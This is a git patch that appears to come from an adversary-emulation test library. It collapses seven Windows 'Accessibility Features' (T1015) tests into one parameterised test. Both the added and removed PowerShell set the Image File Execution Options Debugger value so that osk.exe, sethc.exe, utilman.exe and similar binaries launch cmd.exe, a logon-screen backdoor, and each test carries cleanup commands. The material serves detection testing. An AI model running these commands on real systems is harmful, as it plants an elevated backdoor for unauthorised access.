From 06361de3375eb2d5197b627ddfc5de07703ad441 Mon Sep 17 00:00:00 2001 From: Andras32 Date: Tue, 28 Jan 2020 15:09:24 -0600 Subject: [PATCH] T1015 collapsed technique into one atomic with additional inputargs (#808) * collapsed technique into one atomic * Update atomics/T1015/T1015.yaml Co-Authored-By: Keith McCammon * Update atomics/T1015/T1015.yaml Co-Authored-By: Keith McCammon * Update atomics/T1015/T1015.yaml Co-Authored-By: Keith McCammon * T1015 removed reference to execution framework * Update description T1015.yaml Co-Authored-By: Keith McCammon * Update dash over colon T1015.yaml Co-Authored-By: Keith McCammon Co-authored-by: Keith McCammon --- atomics/T1015/T1015.yaml | 234 +++++---------------------------------- 1 file changed, 28 insertions(+), 206 deletions(-) diff --git a/atomics/T1015/T1015.yaml b/atomics/T1015/T1015.yaml index 24754b05..98198fc1 100644 --- a/atomics/T1015/T1015.yaml +++ b/atomics/T1015/T1015.yaml @@ -3,222 +3,44 @@ attack_technique: T1015 display_name: Accessibility Features atomic_tests: -- name: Attaches Command Prompt As Debugger To Process - osk +- name: Attaches Command Prompt as a Debugger to a List of Target Processes description: | This allows adversaries to execute the attached process + Attaches cmd.exe to osk.exe by default. Other useful values to include in parent_list include: "sethc.exe", "utilman.exe", "magnify.exe", "narrator.exe", "DisplaySwitch.exe", "atbroker.exe". supported_platforms: - windows input_arguments: - target_executable: - description: File You Want To Attach cmd To + parent_list: + description: Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" type: String - default: osk.exe + default: "osk.exe" + attached_process: + description: Full path to process to attach to target in #{parent_list}. Default: cmd.exe + type: Path + default: C:\windows\system32\cmd.exe executor: name: powershell elevation_required: true command: | - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" - $Value = "C:\windows\system32\cmd.exe" - $Name = "Debugger" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } + $input_table = #{parent_list} + Foreach ($item in $input_table){ + $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" + $Value = "#{attached_process}" + $Name = "Debugger" + IF(!(Test-Path $registryPath)) + { + New-Item -Path $registryPath -Force + New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force + } + ELSE + { + New-ItemProperty -Path $registryPath -Name $name -Value $Value + } + } cleanup_command: | - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f - - -- name: Attaches Command Prompt As Debugger To Process - sethc - description: | - This allows adversaries to execute the attached process - - supported_platforms: - - windows - input_arguments: - target_executable: - description: File You Want To Attach cmd To - type: String - default: sethc.exe - - executor: - name: powershell - elevation_required: true - command: | - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" - $Value = "C:\windows\system32\cmd.exe" - $Name = "Debugger" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - cleanup_command: | - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f - -- name: Attaches Command Prompt As Debugger To Process - utilman - description: | - This allows adversaries to execute the attached process - - supported_platforms: - - windows - input_arguments: - target_executable: - description: File You Want To Attach cmd To - type: String - default: utilman.exe - - executor: - name: powershell - elevation_required: true - command: | - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" - $Value = "C:\windows\system32\cmd.exe" - $Name = "Debugger" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - cleanup_command: | - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f - -- name: Attaches Command Prompt As Debugger To Process - magnify - description: | - This allows adversaries to execute the attached process - - supported_platforms: - - windows - input_arguments: - target_executable: - description: File You Want To Attach cmd To - type: String - default: magnify.exe - - executor: - name: powershell - elevation_required: true - command: | - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" - $Value = "C:\windows\system32\cmd.exe" - $Name = "Debugger" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - cleanup_command: | - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f - -- name: Attaches Command Prompt As Debugger To Process - narrator - description: | - This allows adversaries to execute the attached process - - supported_platforms: - - windows - input_arguments: - target_executable: - description: File You Want To Attach cmd To - type: String - default: narrator.exe - - executor: - name: powershell - elevation_required: true - command: | - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" - $Value = "C:\windows\system32\cmd.exe" - $Name = "Debugger" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - cleanup_command: | - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f - - -- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch - description: | - This allows adversaries to execute the attached process - - supported_platforms: - - windows - input_arguments: - target_executable: - description: File You Want To Attach cmd To - type: String - default: DisplaySwitch.exe - - executor: - name: powershell - elevation_required: true - command: | - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" - $Value = "C:\windows\system32\cmd.exe" - $Name = "Debugger" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - cleanup_command: | - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f - - -- name: Attaches Command Prompt As Debugger To Process - AtBroker - description: | - This allows adversaries to execute the attached process - - supported_platforms: - - windows - input_arguments: - target_executable: - description: File You Want To Attach cmd To - type: String - default: atbroker.exe - - executor: - name: powershell - elevation_required: true - command: | - $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" - $Value = "C:\windows\system32\cmd.exe" - $Name = "Debugger" - IF(!(Test-Path $registryPath)) - { - New-Item -Path $registryPath -Force | Out-Null - New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force - } - ELSE - { - New-ItemProperty -Path $registryPath -Name $name -Value $Value - } - cleanup_command: | - reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f + $input_table = #{parent_list} + Foreach ($item in $input_table){ + reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f + }